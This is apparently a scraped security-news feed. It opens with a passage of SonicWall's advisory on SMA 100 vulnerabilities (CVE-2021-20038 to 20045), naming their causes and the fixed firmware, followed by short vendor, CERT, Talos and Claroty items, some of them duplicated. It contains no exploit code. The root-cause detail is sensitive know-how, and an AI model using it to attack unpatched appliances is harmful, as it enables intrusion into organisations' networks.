Unauthenticated CPU Exhaustion Vulnerability (CVSS 7.5)A high severity vulnerability (CVSS 7.5) in SMA 100 appliances, which includes SMA 200, 210, 400, 410 and 500v could allow an unauthenticated and remote adversary to consume all of the device’s CPU potentially causing DoS. It was observed that the SMA100 appliances with WAF licensed/enabled are also impacted by this vulnerability.The CPU exhaustion is due to the crafted HTTP requests sent to https://address/fileshare/sonicfiles/sonicfiles` resulting in an infinite loop in the `fileexplorer` process.There is no evidence that this vulnerability is being exploited in the wild.SonicWall strongly urges that organizations follow the guidance below to patch SMA 100 series products, which include SMA 200, 210, 400, 410 and 500v.IMPACT:As outlined in SNWLID-2021-0026, successfully leveraging CVE-2021-20041 against impacted SMA 100 devices can allow an unauthenticated and remote adversary to consume all of the device’s CPU potentially causing DoS. Impacted Platforms Impacted Versions SMA 100 Series (SMA 200, 210, 400, 410, 500v) 9.0.0.11-31sv, 10.2.0.8-37sv, 10.2.1.1-19sv   5.  Security Notice: SMA-3208 - SMA 100 Series Unauthenticated "Confused Deputy" Vulnerability (CVSS 6.3)A medium severity vulnerability (CVSS 6.3) in SMA 100 appliances, which includes SMA 200, 210, 400, 410 and 500v could allow a remote unauthenticated attacker to use SMA 100 series devices as an "unintended proxy or intermediary" (aka Confused Deputy - see CWE-441). Outside attacker can use the SMA 100 as undetectable proxy to bypass firewall rules. It was observed that SMA 100 devices with WAF licensed/enabled are also impacted by this vulnerability.There is no evidence that this vulnerability is being exploited in the wild.SonicWall strongly urges that organizations follow the guidance below to patch SMA 100 series products, which include SMA 200, 210, 400, 410 and 500v.IMPACT:As outlined in SNWLID-2021-0026, successfully leveraging CVE-2021-20042 against impacted SMA 100 devices can allow the remote unauthenticated attacker to use SMA 100 series devices as an "unintended proxy or intermediary" (aka Confused Deputy - see CWE-441). The outside attacker can use the SMA 100 as undetectable proxy to bypass firewall rules. Impacted Platforms Impacted Versions SMA 100 Series (SMA 200, 210, 400, 410, 500v) 9.0.0.11-31sv, 10.2.0.8-37sv, 10.2.1.1-19sv  6.  Security Notice: SMA-3231 - SMA 100 Series getBookmarks Heap-based Buffer Overflow (CVSS 8.8)A critical severity vulnerability (CVSS 8.8) in SMA 100 appliances, which includes SMA 200, 210, 400, 410 and 500v could allow a Remote authenticated attacker can cause Heap-based Buffer Overflow and would result in code execution as the nobody user in the SMA100 appliance. It was observed that the SMA100 appliances with WAF licensed/enabled are also impacted by this vulnerability.This Vulnerability is due to the RAC_GET_BOOKMARKS_HTML5 (RacNumber 35) method that allows users to list their bookmarks. This method is vulnerable to heap-based buffer-overflow, due to unchecked use of strcat. So remote authenticated attacker can cause Heap-based Buffer Overflow and would result in code execution as the nobody user in the SMA100 appliance. There is no evidence that this vulnerability is being exploited in the wild.SonicWall strongly urges that organizations follow the guidance below to patch SMA 100 series products, which include SMA 200, 210, 400, 410 and 500v.IMPACT:As outlined in SNWLID-2021-0026, successfully leveraging CVE-2021-20043 against impacted SMA 100 devices can allow a Remote authenticated attacker can cause Heap-based Buffer Overflow and would result in code execution as the nobody user in the SMA100 appliance. Impacted Platforms Impacted Versions SMA 100 Series (SMA 200, 210, 400, 410, 500v) 10.2.0.8-37sv, 10.2.1.1-19sv  7.  Security Notice: SMA-3233 - SMA 100 Series POST-Authentication Remote Code Execution (RCE) (CVSS 7.2)A high severity vulnerability (CVSS 7.2) in SMA 100 appliances, which includes SMA 200, 210, 400, 410 and 500v could allow a Remote authenticated attacker to execute system commands as ‘nobody’, the attacker can modify/delete files in the cgi-bin directory and also able to reboot system remotely. It was observed that the SMA100 appliances with WAF licensed/enabled are also impacted by this vulnerability.This Vulnerability is due to an exposed Management API which is written in Python Flask. Remote authenticated attacker can execute system commands as ‘nobody’ user in the SMA100 appliance.There is no evidence that this vulnerability is being exploited in the wild.SonicWall strongly urges that organizations follow the guidance below to patch SMA 100 series products, which include SMA 200, 210, 400, 410 and 500v.IMPACT:As outlined in SNWLID-2021-0026, successfully leveraging CVE-2021-20044 against impacted SMA 100 devices could allow a Remote authenticated attacker to execute system commands as ‘nobody’, the attacker can modify/delete files in the cgi-bin directory and also able to reboot system remotely. Impacted Platforms Impacted Versions SMA 100 Series (SMA 200, 210, 400, 410, 500v) 10.2.0.8-37sv, 10.2.1.1-19sv   8.  Security Notice: SMA-3235 - Multiple SMA 100 Unauthenticated File Explorer Heap-based and Stack-based Buffer Overflows (CVSS 9.4)A critical severity vulnerability (CVSS 9.4) in SMA 100 appliances, which includes SMA 200, 210, 400, 410 and 500v could allow a remote unauthenticated attacker to cause Heap-based and Stack-based Buffer Overflow and would result in code execution as the nobody user in the SMA100 appliance. It was observed that the SMA100 appliances with WAF licensed/enabled are also impacted by this vulnerability. Exploitation potentially leading to code execution.This Vulnerability is due to the sonicfiles RAC_COPY_TO (RacNumber 36) method which allows users to upload files to an SMB share and can be called without any authentication. RacNumber 36 of the sonicfiles API maps to the upload_file Python method and this is associated with filexplorer binary, which is a custom program written in C++ which is vulnerable to a number of memory safety issues.There is no evidence that this vulnerability is being exploited in the wild.SonicWall strongly urges that organizations follow the guidance below to patch SMA 100 series products, which include SMA 200, 210, 400, 410 and 500v.IMPACT:As outlined in SNWLID-2021-0026, successfully leveraging CVE-2021-20045 against impacted SMA 100 devices could allow a remote unauthenticated attacker to cause Heap-based and Stack-based Buffer Overflow and would result in code execution as the nobody user in the SMA100 appliance. Impacted Platforms Impacted Versions SMA 100 Series (SMA 200, 210, 400, 410, 500v) 10.2.0.8-37sv, 10.2.1.1-19sv   ·        Impacted Platform: SMA 100 Series (SMA 200, 210, 400, 410, 500v (ESX, Hyper-V, KVM, AWS, Azure) ISSUE ID Summary CVSS Score Impacted Firmware Fixed Firmware  CVE SMA 3217 Critical SMA 100 Series Unauthenticated Stack-based Buffer Overflow               9.8 High 10.2.1.0-17sv   10.2.1.3-27sv CVE-2021-20038 10.2.1.1-19sv   10.2.1.3-27sv 10.2.1.2-24sv   10.2.1.3-27sv SMA 3204 SMA 100 Series Authenticated Command Injection Vulnerability as Root   7.2 High 9.0.0.11-31sv* 10.2.0.9-41sv CVE-2021-20039 10.2.0.8-37sv 10.2.0.9-41sv 10.2.1.1 -19sv 10.2.1.3-27sv SMA 3206 Unauthenticated File Upload Path Traversal Vulnerability 6.5 Medium   10.2.0.8-37sv   10.2.0.9-41sv CVE-2021-20040     10.2.1.1 -19sv     10.2.1.3-27sv SMA 3207 Unauthenticated CPU Exhaustion Vulnerability 7.5 High    9.0.0.11-31sv*   10.2.0.9-41sv CVE-2021-20041   10.2.0.8-37sv   10.2.0.9-41sv   10.2.1.1 -19sv   10.2.1.3-27sv SMA-3208 Unauthenticated "Confused Deputy" Vulnerability 6.3 Medium    9.0.0.11-31sv*   10.2.0.9-41sv CVE-2021-20042   10.2.0.8-37sv   10.2.0.9-41sv   10.2.1.1 -19sv   10.2.1.3-27sv SMA-3231 getBookmarks Heap-based Buffer Overflow 8.8 High   10.2.0.8-37sv   10.2.0.9-41sv CVE-2021-20043   10.2.1.1 -19sv   10.2.1.3-27sv SMA-3233 Post-Authentication Remote Code Execution (RCE) 7.2 High   10.2.0.8-37sv   10.2.0.9-41sv CVE-2021-20044   10.2.1.1 -19sv   10.2.1.3-27sv SMA-3235 Multiple SMA 100 Unauthenticated File Explorer Heap-based and Stack-based Buffer Overflows 9.4 High   10.2.0.8-37sv   10.2.0.9-41sv CVE-2021-20045   10.2.1.1 -19sv   10.2.1.3-27sv CVE: CVE-2021-20038, CVE-2021-20039, CVE-2021-20040, CVE-2021-20041, CVE-2021-20042, CVE-2021-20043, CVE-2021-20044, CVE-2021-20045 Last updated: April 28, 2022, 11:20 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026
Meeting in person at the FIRST Oslo Technical Colloquium
2021-12-07T17:00:00Z | 1638896400

Last month, I was honored to be one of the planners and participants of the FIRST Technical Colloquium (TC) in Norway. Organized by FIRST members, the event was held just outside of Oslo at the Telenor Expo, Telenor headquarters in Fornebu.

https://www.first.org/blog/20211129-meeting_person_first_oslo_technical_colloquium
Meeting in person at the FIRST Oslo Technical Colloquium
2021-12-07T17:00:00Z | 1638896400

Last month, I was honored to be one of the planners and participants of the FIRST Technical Colloquium (TC) in Norway. Organized by FIRST members, the event was held just outside of Oslo at the Telenor Expo, Telenor headquarters in Fornebu.

https://www.first.org/blog/20211129-meeting_person_first_oslo_technical_colloquium
New Insight Into SASE from the Recent Gartner® Report on Impact Radar: Communications
2021-12-07T12:01:41Z | 1638878501

In the recent Emerging Technologies and Trends Impact Radar: Communications,1 Gartner expanded our understanding of what it means to be a SASE platform. The Gartner report states, “While the list of individual capabilities continues to evolve and differ between vendors, serving those capabilities from the cloud edge is non-negotiable and fundamental to SASE. There are... The post New Insight Into SASE from the Recent Gartner® Report on Impact Radar: Communications appeared first on Cato Networks.

https://www.catonetworks.com/blog/new-insight-into-sase-from-the-recent-gartner-report-on-impact-radar-communications/
Information security seminar attracted record audience
2021-12-07T11:46:23Z | 1638877583

The information security seminar Tietoturva 2021 celebrated the 20th anniversary of the CERT unit at the National Cyber Security Centre Finland. The popular seminar was organised online and attracted an audience of more than 1,700 attendants.

https://www.kyberturvallisuuskeskus.fi/en/news/information-security-seminar-attracted-record-audience
Information security seminar attracted record audience
2021-12-07T11:46:23Z | 1638877583

The information security seminar Tietoturva 2021 celebrated the 20th anniversary of the CERT unit at the National Cyber Security Centre Finland. The popular seminar was organised online and attracted an audience of more than 1,700 attendants.

https://www.kyberturvallisuuskeskus.fi/en/news/information-security-seminar-attracted-record-audience
LähiTapiola recognised as Information Security Trailblazer
2021-12-07T11:44:09Z | 1638877449

The Finnish insurance company LähiTapiola received the Information Security Trailblazer award at the online seminar Tietoturva 2021 on 24 November 2021. LähiTapiola has actively raised awareness about information security with positive messages. It has also played a key role as an information security influencer in the Finnish society at large.

https://www.kyberturvallisuuskeskus.fi/en/news/lahitapiola-recognised-information-security-trailblazer
LähiTapiola recognised as Information Security Trailblazer
2021-12-07T11:44:09Z | 1638877449

The Finnish insurance company LähiTapiola received the Information Security Trailblazer award at the online seminar Tietoturva 2021 on 24 November 2021. LähiTapiola has actively raised awareness about information security with positive messages. It has also played a key role as an information security influencer in the Finnish society at large.

https://www.kyberturvallisuuskeskus.fi/en/news/lahitapiola-recognised-information-security-trailblazer
Security Alert (A21-12-01): Multiple vulnerabilities in Google Chrome
2021-12-07T04:00:00Z | 1638849600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
WebAssembly and Back Again: Fine-Grained Sandboxing in Firefox 95
2021-12-06T17:56:35Z | 1638813395

In Firefox 95, we’re shipping a novel sandboxing technology called RLBox — developed in collaboration with researchers at the University of California San Diego and the University of Texas — … Read more

https://blog.mozilla.org/attack-and-defense/2021/12/06/webassembly-and-back-again-fine-grained-sandboxing-in-firefox-95/
Cato Networks Adds Protection from the Perils of Cybersquatting
2021-12-06T06:25:01Z | 1638771901

A technique long used for profiting from the brand strength of popular domain names is finding increased use in phishing attacks. Cybersquatting (also called domain squatting) is the use of a domain name with the intent to profit from the goodwill of a trademark belonging to someone else. Increasingly, attackers are tapping cybersquatting to harvest... The post Cato Networks Adds Protection from the Perils of Cybersquatting appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-networks-adds-protection-from-the-perils-of-cybersquatting/
Dream Report ODS Remote Connector privilege escalation vulnerability
2021-12-06T00:00:00Z | 1638748800

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1384
Gerbv RS-274X aperture macro outline primitive integer overflow vulnerability
2021-12-06T00:00:00Z | 1638748800

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1405
Gerbv RS-274X format aperture macro variables out-of-bounds write vulnerability
2021-12-06T00:00:00Z | 1638748800

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1404
18ª Edição do Curso Geral de Cibersegurança – Inscrições abertas
2021-12-03T00:00:00Z | 1638489600

O principal objetivo deste curso, que detém uma componente genérica acerca das temáticas ligadas à cibersegurança, passa por consciencializar e promover uma reflexão sobre cibersegurança junto dos participantes. Neste sentido, serão abordadas as diversas dimensões (técnica, organizacional e de gestão) onde a cibersegurança assume um lugar central.Tendo em conta o papel preponderante que o CNCS tem desenvolvido junto dos cidadãos e das entidades, o curso será ministrado por um painel de oradores diversificado, de forma a abordar diferentes visões acerca da cibersegurança nacional e internacional. Desta forma, serão abordados temas tais como “Conceitos e Ecossistema da cibersegurança”, “Ciberespionagem”, “Combate ao cibercrime”, “Ciber(in)segurança”, “Fator Humano da cibersegurança”, entre vários outros temas de relevo.Aviso: As inscrições para a 18º Edição do Curso Geral de Cibersegurança já se encontram encerradas.Para mais informações aceda ao espaço dedicado a este curso disponível no site.

https://dyn.cncs.gov.pt/pt/detalhe/art/135606/18-edicao-do-curso-geral-de-ciberseguranca-inscricoes-abertas
Cyber Monday Web Traffic Up Over 2020
2021-12-01T21:05:00Z | 1638392700

Online retail traffic that Akamai delivered during Cyber Monday was up 5% globally compared to Cyber Monday 2020 and 31% compared to average Monday traffic.

https://www.akamai.com/blog/trends/cyber-monday-web-traffic-up-over-2020
IPS Features and Requirements: Is an Intrusion Prevention System Enough?
2021-12-01T07:04:31Z | 1638342271

IPS (Intrusion Prevention System) is a technology for securing networks by scanning and blocking malicious network traffic. By identifying suspicious activities and dropping packets, an IPS can help reduce the attack surface of an enterprise network. Security attacks like DoS (Denial of Service), brute force attacks, viruses, worms and attacking temporary exploits can all be... The post IPS Features and Requirements: Is an Intrusion Prevention System Enough? appeared first on Cato Networks.

https://www.catonetworks.com/blog/is-an-intrusion-prevention-system-enough/
UK and US call out Russia for SolarWinds compromise
2021-12-01T06:17:52Z | 1638339472

Russia’s Foreign Intelligence Service (SVR) responsible for intrusion of global software supplier.

https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise
Google Chrome Blink setBaseAndExtent use after free vulnerability
2021-11-30T00:00:00Z | 1638230400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1352
ID&E: Akamai?s Journey of Continuous Improvement
2021-11-29T14:00:00Z | 1638194400

Akamai was founded to give the brightest minds somewhere to grow ? and by surrounding ourselves with supportive individuals and an open culture, we can all bring our best, every day. It?s for this reason that our commitment to inclusion, diversity, and engagement is a key cornerstone of how we operate. Not as an objective or goal to be achieved, but as a journey of continuous learning and improvement that we can all benefit from, individually and collectively.

https://www.akamai.com/blog/culture/id-and-e-akamais-journey-of-continuous-improvement
Black Friday Web Traffic Up Over 2020
2021-11-29T09:00:00Z | 1638176400

Online retail traffic that Akamai delivered during Black Friday was up 2% globally compared to Black Friday 2020 and 14% compared to average Friday retail traffic. The modest year-over-year increase can be attributed to the significant rise in 2020 traffic due to COVID-19?related lockdowns and restrictions that kept many shoppers out of physical stores.

https://www.akamai.com/blog/trends/black-friday
Anker Eufy Homebase 2 home_security CMD_DEVICE_GET_RSA_KEY_REQUEST authentication bypass vulnerability
2021-11-29T00:00:00Z | 1638144000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1379
Anker Eufy Homebase 2 home_security CMD_DEVICE_GET_SERVER_LIST_REQUEST out-of-bounds write vulnerability
2021-11-29T00:00:00Z | 1638144000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1378
Anker Eufy Homebase 2 home_security get_aes_key_info_by_packetid() authentication bypass vulnerability
2021-11-29T00:00:00Z | 1638144000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1382
Anker Eufy Homebase 2 home_security wifi_country_code_update command execution vulnerability
2021-11-29T00:00:00Z | 1638144000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1381
Anker Eufy Homebase 2 home_security process_msg() authentication bypass vulnerability
2021-11-29T00:00:00Z | 1638144000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1380
Publicados vídeos com recomendações para que as organizações elevem o seu nível de cibersegurança
2021-11-29T00:00:00Z | 1638144000

O Centro Nacional de Cibersegurança, no seguimento da disponibilização de referenciais e ferramentas de capacitação em cibersegurança, vem agora disponibilizar mais um instrumento de apoio às organizações no desenvolvimento de valências mínimas em cibersegurança. Este conjunto de vídeos, organizado em 23 módulos, enquadra-se como complemento do Roteiro para as Capacidades Mínimas de Cibersegurança e é associado ao Quadro Nacional de Referência para a Cibersegurança.Estes vídeos apresentam várias recomendações para que as organizações elevem o nível de cibersegurança através da melhoria sustentada e coerente das suas capacidades técnicas, humanas e processuais.Consulte os vídeos aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135604/publicados-videos-com-recomendacoes-para-que-as-organizacoes-elevem-o-seu-nivel-de-ciberseguranca
NCSC-FI issued a severe alert on malware being spread by SMS
2021-11-26T10:09:59Z | 1637921399

The FluBot malware that caused trouble among Android users earlier this year is being spread again. In the past few days, the National Cyber Security Centre (NCSC-FI) at the Finnish Transport and Communications Agency has received increasing numbers of reports about dozens of message variants used to spread the malware.

https://www.kyberturvallisuuskeskus.fi/en/news/ncsc-fi-issued-severe-alert-malware-being-spread-sms
NCSC-FI issued a severe alert on malware being spread by SMS
2021-11-26T10:09:59Z | 1637921399

The FluBot malware that caused trouble among Android users earlier this year is being spread again. In the past few days, the National Cyber Security Centre (NCSC-FI) at the Finnish Transport and Communications Agency has received increasing numbers of reports about dozens of message variants used to spread the malware.

https://www.kyberturvallisuuskeskus.fi/en/news/ncsc-fi-issued-severe-alert-malware-being-spread-sms
Be aware of malware spread by SMS
2021-11-26T07:23:39Z | 1637911419

The FluBot campaign has become active again, and the malware is being spread by SMS. Based on reports received by the National Cyber Security Centre (NCSC-FI), scam messages written in Finnish are being sent to tens of thousands of people in Finland.

https://www.kyberturvallisuuskeskus.fi/en/be-aware-malware-spread-sms
Teisipäeval uuenes küberteadmiste portaal itvaatlik.ee
2021-11-25T12:37:24Z | 1637843844

Sel nädalal alustas tööd uuenduskuuri läbinud IT-vaatliku portaal, mis koondab ühte keskkonda kokku kasulikud näpunäited, kuidas oma küberturvalisust parandada. Veebisaidi sihtrühmaks on nii eraisikud, ettevõtted kui ka avalik sektor.

https://ria.ee/uudised/teisipaeval-uuenes-kuberteadmiste-portaal-itvaatlikee
2011. aastal tuvastasid teadlased Eestis kasutusel olevas ID-kaardis turvanõrkuse
2021-11-25T06:49:51Z | 1637822991

Ligi 120 000 ID-kaarti puudutanud turvanõrkus seisnes selles, et teatud ründevektori tulemusel oli võimalik kasutada kaarti ilma PIN1 ja PIN2 koodi teadmata (ehk anda ka digiallkirja). Selleks, et rünne läbi viia, pidi ründaja enda kätte saama kasutaja ID-kaardi ning ID-kaart pidi olema kehtiv (kaardi kaotamise korral üldjuhul sellest teavitatakse ning sertifikaadid peatatakse või tühistatakse). ID-kaartide kuritarvitustest teateid ei olnud ega ole siiani.

https://ria.ee/uudised/2011-aastal-tuvastasid-teadlased-eestis-kasutusel-olevas-id-kaardis-turvanorkuse
Security Alert (A21-11-12): Multiple Vulnerabilities in VMWare Products
2021-11-24T04:00:00Z | 1637726400

VMware has published a security advisory to address multiple vulnerabilities in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
DataStream: Real-time Log Delivery for All Akamai Customers
2021-11-23T14:00:00Z | 1637676000

We are pleased to announce that DataStream 2 is now available for all our customers. DataStream 2 provides customers with detailed log data from requests on the Akamai Intelligent Edge Platform within minutes. DataStream 2 gives customers unparalleled visibility into events at the Akamai edge and puts developers first by empowering them with the data needed to support critical operations.

https://www.akamai.com/blog/news/datastream-real-time-log-delivery-for-all-akamai-customers
Security Alert (A21-11-11): Multiple Vulnerabilities in Microsoft Edge (Chromium-based)
2021-11-22T04:00:00Z | 1637553600

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
Advantech R-SeeNet application multiple SQL injection vulnerabilities in the 'group_list' page
2021-11-22T00:00:00Z | 1637539200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1363
Advantech R-SeeNet application multiple SQL injection vulnerabilities in the 'company_list' page
2021-11-22T00:00:00Z | 1637539200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1364
Advantech R-SeeNet application multiple SQL injection vulnerabilities in the 'user_list' page
2021-11-22T00:00:00Z | 1637539200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1365
Advantech R-SeeNet installation privilege escalation vulnerability
2021-11-22T00:00:00Z | 1637539200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1360
CloudLinux Inc Imunify360 Ai-Bolit php unserialize vulnerability
2021-11-22T00:00:00Z | 1637539200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1383
Advantech R-SeeNet application multiple SQL injection vulnerabilities in the 'device_list' page
2021-11-22T00:00:00Z | 1637539200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1366
3 Principles for Effective Business Continuity Planning
2021-11-21T17:26:04Z | 1637515564

Business continuity planning (BCP) is all about being ready for the unexpected. While BCP is a company-wide effort, IT plays an especially important role in maintaining business operations, with the task of ensuring redundancy measures and backup for data centers in case of an outage. With enterprises migrating to the cloud and adopting a work-from-anywhere model, BCP today must also include continual... The post 3 Principles for Effective Business Continuity Planning appeared first on Cato Networks.

https://www.catonetworks.com/blog/3-principles-for-effective-business-continuity-planning/
8 SASE Drivers for Modern Enterprises
2021-11-21T14:51:56Z | 1637506316

The post 8 SASE Drivers for Modern Enterprises appeared first on Cato Networks.

https://www.catonetworks.com/resources/8-sase-drivers-for-modern-enterprises/
Getting Ready for Some Holiday Shopping? So Are the Bots
2021-11-19T14:00:00Z | 1637330400

https://www.akamai.com/blog/news/getting-ready-for-some-holiday-shopping-so-are-the-bots
Placing Accessibility at Akamai ? In Reach
2021-11-19T14:00:00Z | 1637330400

Encouraging and supporting open discussions about disability and mental health at work. We define disability as a condition that affects everyday activities ? physically, cognitively, and/or neurologically. In Reach helps the Akamai community understand what disability means in the workplace. As a team, we also ensure disabled colleagues have the support they need to thrive ? so that success is always "in reach."

https://www.akamai.com/blog/culture/placing-accessibility-at-akamai-in-reach
Retail Data Needs Better Security in a Contextual World
2021-11-18T20:00:00Z | 1637265600

Do you remember the first time you made an online purchase? Me neither. I?ve made so many online purchases over the years, and I?ve probably made more in the past 18 months than in the past 5 years combined.

https://www.akamai.com/blog/trends/retail-data-needs-better-security-in-a-contextual-world
Healthcare Modernization? More Like Building the Plane While Flying It
2021-11-18T19:00:00Z | 1637262000

Anyone running a business is likely familiar with the phrase ?building the plane as you?re flying it.? And through the craziness of the past 19 months, many of us lived the phrase, becoming pilots and engineers of our new realities overnight.

https://www.akamai.com/blog/trends/healthcare-modernization-more-like-building-the-plane
Fighting Video Piracy Is Strengthened by Collaboration
2021-11-18T14:00:00Z | 1637244000

Here?s what I know: My personal email has been ?pwned? or stolen at least 18 times. Here?s what I don?t know: if any of the times I have been unable to log in to one of my OTT subscription services was due to my kids sharing our credentials or because of an account takeover ? that kill chain that starts with harvesting stolen username/password combinations and then testing them via a credential stuffing attack.

https://www.akamai.com/blog/trends/fighting-video-piracy-is-strengthened-by-collaboration
Finding My Way as an Akamai Intern
2021-11-18T14:00:00Z | 1637244000

It?s an exciting time to be starting a career in digital ? but even more so when it?s at a company like Akamai. An organization driven by a commitment to developing talent within the industry, Akamai is an intellectually rigorous, demanding, and rewarding environment to be in at any level. But for new starters, programs like the summer internship can provide a 10- to 12-week opportunity to meet people and learn new skills ? with real-world experiences, close working relationships, and access to subject matter experts.

https://www.akamai.com/blog/culture/finding-my-way-as-an-akamai-intern
Security Alert (A21-11-10) Multiple Vulnerabilities in Drupal
2021-11-18T04:00:00Z | 1637208000

Drupal has released a security advisory to address multiple vulnerabilities in the CKEditor library for WYSIWYG editing.

https://www.govcert.gov.hk/en/alerts_detail.php
RTL Nederland Makes Weather Forecasting Fast, Reliable and Sustainable with Help From Akamai
2021-11-17T14:00:00Z | 1637157600

Media giant RTL Nederland offers a weather app that gives users the ability to get a comprehensive overview of the weather in their location at the click of a button. Akamai is delighted that this exciting media brand has chosen us to deliver a rich and engaging web experience for its viewers while providing a sustainable infrastructure via our Akamai Intelligent Edge Platform.

https://www.akamai.com/blog/news/rtl-nederland-makes-weather-forecasting-fast-reliable-sustainable-with-help-from-akamai
MUI: Visualizing symbolic execution with Manticore and Binary Ninja
2021-11-17T12:00:55Z | 1637150455

During my summer internship, I had the wonderful opportunity to work on the Manticore User Interface (MUI). The MUI project aims to combine the strength of both Manticore, a powerful symbolic execution library, and Binary Ninja, a popular binary analysis tool, to provide a more intuitive and visual interface […]

https://blog.trailofbits.com/2021/11/17/mui-visualizing-symbolic-execution-with-manticore-and-binary-ninja/
How Cato Was Able to Meet the CISA Directive So Quickly
2021-11-17T08:21:53Z | 1637137313

We just made an announcement today that’s a textbook example of the power of our IPS. All mobile users, offices, and cloud resources anywhere in the world on the Cato SASE Cloud are now protected against network-based threats exploiting the exposures the Cybersecurity and Infrastructure Security Agency (CISA) identified two weeks ago. Actually, the time... The post How Cato Was Able to Meet the CISA Directive So Quickly appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-cato-was-able-to-meet-the-cisa-directive-so-quickly/
LibreCad libdxfrw dxfRW::processLType() use-after-free vulnerability
2021-11-17T00:00:00Z | 1637107200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1351
LibreCad libdxfrw dwgCompressor::decompress18() out-of-bounds write vulnerability
2021-11-17T00:00:00Z | 1637107200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1349
LibreCad libdxfrw dwgCompressor::copyCompBytes21 heap-based buffer overflow vulnerability
2021-11-17T00:00:00Z | 1637107200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1350
CNCS aprova projeto de regulamento para instrução técnica relativa a DL n.º 65/2021
2021-11-17T00:00:00Z | 1637107200

O CNCS aprovou o projeto de Regulamento que configura a Instrução Técnica relativa à comunicação e informação referentes a pontos de contacto permanente, responsável de segurança, inventário de ativos, relatório anual e notificação de incidentes, para dar cumprimento ao estabelecido no Decreto-Lei n.º 65/2021 e contribuir para a implementação das obrigações de notificação de incidentes à Autoridade Nacional de Cibersegurança e as obrigações de implementação de requisitos de segurança para a Administração Pública, os operadores de infraestruturas críticas, os operadores de serviços essenciais e os prestadores de serviços digitais. Submete-se, assim, a consulta pública, a referida instrução técnica para a recolha de comentários, procedendo-se, para o efeito, à publicação de aviso na 2.ª série do Diário da República e à difusão na página do Centro Nacional de Cibersegurança na internet.Os comentários devem ser enviados por escrito e em língua portuguesa, utilizando preferencialmente o endereço eletrónico drsc@cncs.gov.pt, no prazo de 30 dias úteis, a contar da data da publicação do aviso no Diário da República.Uma vez encerrada a consulta pública, o Centro Nacional de Cibersegurança procederá à apreciação dos contributos apresentados pelos interessados e disponibilizará um relatório contendo referência a todos os contributos recebidos, bem como uma apreciação global que reflita o entendimento sobre os mesmos e os fundamentos das opções tomadas.

https://dyn.cncs.gov.pt/pt/detalhe/art/135602/cncs-aprova-projeto-de-regulamento-para-instrucao-tecnica-relativa-a-dl-n-652021
CVE-2021-31890
2021-11-17T00:00:00Z | 1637107200

CWE-240: IMPROPER HANDLING OF INCONSISTENT STRUCTURAL ELEMENTS The total length of a TCP payload (set in the IP header) is unchecked. This may lead to various side effects, including information leak and denial-of-service conditions, depending on the network buffer organization in memory.

https://claroty.com/team82/disclosure-dashboard/cve-2021-31890
CVE-2021-31889
2021-11-17T00:00:00Z | 1637107200

CWE-191: INTEGER UNDERFLOW (WRAP OR WRAPAROUND) Malformed TCP packets with a corrupted SACK option lead to information leaks and denial-of-service conditions.

https://claroty.com/team82/disclosure-dashboard/cve-2021-31889
CVE-2021-31888
2021-11-17T00:00:00Z | 1637107200

CWE-170: IMPROPER NULL TERMINATION FTP server does not properly validate the length of the "MKD/XMKD" command, leading to stack-based buffer overflows. This may result in denial-of-service conditions and remote code execution.

https://claroty.com/team82/disclosure-dashboard/cve-2021-31888
CVE-2021-31887
2021-11-17T00:00:00Z | 1637107200

CWE-170: IMPROPER NULL TERMINATION FTP server does not properly validate the length of the "PWD/XPWD" command, leading to stack-based buffer overflows. This may result in denial-of-service conditions and remote code execution.

https://claroty.com/team82/disclosure-dashboard/cve-2021-31887
CVE-2021-31886
2021-11-17T00:00:00Z | 1637107200

CWE-170: IMPROPER NULL TERMINATION FTP server does not properly validate the length of the "USER" command, leading to stack-based buffer overflows. This may result in denial-of-service conditions and remote code execution.

https://claroty.com/team82/disclosure-dashboard/cve-2021-31886
CVE-2021-31885
2021-11-17T00:00:00Z | 1637107200

CWE-805: BUFFER ACCESS WITH INCORRECT LENGTH VALUE TFTP server application allows for reading the contents of the TFTP memory buffer via sending malformed TFTP commands.

https://claroty.com/team82/disclosure-dashboard/cve-2021-31885
CVE-2021-31884
2021-11-17T00:00:00Z | 1637107200

CWE-170: IMPROPER NULL TERMINATION The DHCP client application assumes the data supplied with the "hostname" DHCP option NULL is terminated. In cases when a global hostname variable is not defined, this may lead to out-of-bound reads, out-of-bounds writes, and denial-of-service conditions.

https://claroty.com/team82/disclosure-dashboard/cve-2021-31884
CVE-2021-31883
2021-11-17T00:00:00Z | 1637107200

CVE-2021-31883

https://claroty.com/team82/disclosure-dashboard/cve-2021-31883
CVE-2021-31882
2021-11-17T00:00:00Z | 1637107200

CWE-119: IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFER The DHCP client application does not validate the length of the domain name server IP option(s) (0x06) when processing DHCP ACK packets. This may lead to denial-of-service conditions.

https://claroty.com/team82/disclosure-dashboard/cve-2021-31882
CVE-2021-31881
2021-11-17T00:00:00Z | 1637107200

CWE-125: OUT-OF-BOUNDS READ When processing a DHCP OFFER message, the DHCP client application does not validate the length of the vendor option(s), leading to denial-of-service conditions.

https://claroty.com/team82/disclosure-dashboard/cve-2021-31881
